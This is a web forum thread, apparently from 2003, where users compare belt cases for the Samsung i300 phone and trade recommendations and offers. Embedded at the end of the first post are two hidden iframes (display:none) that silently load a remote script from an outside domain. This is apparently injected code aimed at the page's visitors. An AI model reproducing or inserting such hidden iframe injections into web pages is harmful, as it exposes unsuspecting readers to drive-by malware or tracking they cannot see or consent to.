+ Reply to Thread

Question Proper Case for the I300

Anyone have any luck finding a properly designed case for the I300? The case supplied with the phone is probably adequate for PDA use but it's a ridiculous design for a heavy phone user.

A decent case ought to probably envelope the phone (similar to the case E&B makes for the Kyocera) but should have a removable cover so your not talking on the phone and folding the cover to one side (or over the top) while you're speaking.

E&B has a neat looking case on their website but you'll have to fold the cover flap over the top and hold it there while talking. Did anyone find anything better?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Check some of the older threads by running a search. Quite a bit of talk about cases.

Looking for case

I have tried virtually all of the cases except the new E&B case. My two favorites are the Ripoff Model CO27A and the Lodis Case sold by Malm Luggage.

The Lodis case has a snap which goes around your belt loop and is leather. The Ripoff model is cloth and has a very secure belt clip.

Peter
    Peter

Need a Samsung Case

Any of you guys want to give/sell/trade the case that came with your phone?
    I lost mine.

with all the talk about bad and good cases, and not having the perfect one, im on the verge of finding someone to hire to tailor one for me...or possibly, do it myself.

Perfect Case

The Ripoffs case (CO27A) is a perfect case in my opinion. It has a very secure belt clip, houses the case well with a good velcro enclosure. Go to the website: www.ripoffs.com

Peter
    Peter

Does the Ripoffs case have a stiffener in the case on the screen side? That's what most of the cell cases are missing. I don't want my screen against a soft case side when I run into something. I noticed it also has a version with a heavy mesh pocket. Do you have that version? Is so, where is the pocket on the case?

Lightbulb i300 case

Those interested in a case for the i300 may check with the sprint retail store in your area. There is a decent storage type case that attaches to one's belt. It is relatively secure;however, it does not have a hard face to protect the screen, so don't run waist first into any walls,poles etc. When the phone rings you just pop it out, and put it back when you are done.
    Last edited by charliebrown; 10-12-2003 at 06:37 PM.

Wink Re: Need a Samsung Case

Originally posted by Austin_Techie
    Any of you guys want to give/sell/trade the case that came with your phone?
    I lost mine.
    I am willing to trade my origianal i300 case for a $10 best buy gift card. What do you say?